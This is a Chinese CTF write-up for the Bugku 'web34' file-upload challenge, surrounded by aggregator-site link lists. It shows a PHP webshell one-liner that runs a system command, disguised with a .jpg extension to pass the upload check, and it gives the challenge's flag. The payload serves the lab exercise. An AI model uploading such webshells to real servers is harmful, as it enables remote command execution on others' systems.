Bugku CTF web34（Web） - 代码天地

Bugku CTF web34（Web）

其他 2021-03-20 12:49:29 阅读次数: 0

0、打开网页，查看源代码

注意注释内容：upload.php

1、打开upload.php文件

文件上传，又是有关木马传入类型的题

2、构造一句话木马，查询flag文件

<script language=php>system("find / -name flag*");</script>

先创建文本文档，再修改扩展名为.jpg

3、上传一句话木马并打开

发现有关flag的储存路径信息

4、打开flag所在路径

5、得到flag：flag{9abf7616b9bddac530fc785ef7a5f3e3}

猜你喜欢

转载自blog.csdn.net/ChaoYue_miku/article/details/114951357

Bugku CTF web34（Web）

Bugku CTF web题

bugku ctf web3

web！bugku ctf习题笔记

CTF - bugku-web-web基础矛盾

Bugku CTF web14（Web）

Bugku CTF web12（Web）

Bugku CTF web11（Web）

Bugku CTF web10（Web）

Bugku CTF web9（Web）

Bugku CTF web8（Web）

Bugku CTF web7（Web）

Bugku CTF web16（Web）

Bugku CTF web15（Web）

Bugku CTF web35（Web）

Bugku CTF web33（Web）

Bugku CTF web28（Web）

Bugku CTF web6（Web）

Bugku CTF web5（Web）

Bugku CTF web4（Web）

Bugku CTF web3（Web）

Bugku CTF web2（Web）

Bugku CTF web27（Web）

Bugku CTF web26（Web）

Bugku CTF web37（Web）

Bugku CTF web13（Web）

Bugku CTF web32（Web）

Bugku CTF web36（Web）

Bugku CTF web31（Web）

Bugku CTF web30（Web）

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

周排行

购置笔记本常识

从源码看Spring Security之采坑笔记（Spring Boot篇）

大数据学习——高可用配置案例

如何避免选择不专业的建站公司?

Euclid's Game HDU - 1525（博弈）

面试笔记（六）---Js实现eventHandler

Windows 实例搭建的 FTP 在外网无法连接和访问

设计模式 : 桥接模式

USB 设备驱动开发之几个重要结构体分析

14-p14_sqrt求平方根

每日归档

更多

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)